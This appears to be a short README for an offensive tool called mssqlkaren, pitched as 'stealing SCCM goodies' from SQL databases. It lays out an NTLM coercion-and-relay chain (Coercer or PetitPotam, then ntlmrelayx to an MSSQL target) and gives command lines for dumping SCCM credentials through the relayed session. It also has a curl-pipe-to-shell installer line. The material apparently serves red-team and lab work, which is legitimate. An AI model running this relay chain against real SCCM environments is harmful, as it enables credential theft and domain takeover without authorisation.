# mssqlkaren

Awesome tool for stealing SCCM goodies from SQL databases.

# Install pre-reqs

```sh
curl -LsSf https://astral.sh/uv/install.sh | sh
```

# Dump creds from an SCCM SQL database

In an SCCM environment with multiple SCCM servers, one of which has SQL on it, relay one of the SCCM servers without SQL (using Coercer or PetitPotam) to the SCCM server with SQL running on it (using something like `ntlmrelayx -t mssql://sccmsql -socks -smb2support`).

Once the relay is established, use mssqlkaren.py to extract SCCM secrets against your established session:

```sh
proxychains uv run mssqlkaren.py ludus/domainadmin:password@10.6.10.13 -windows-auth
```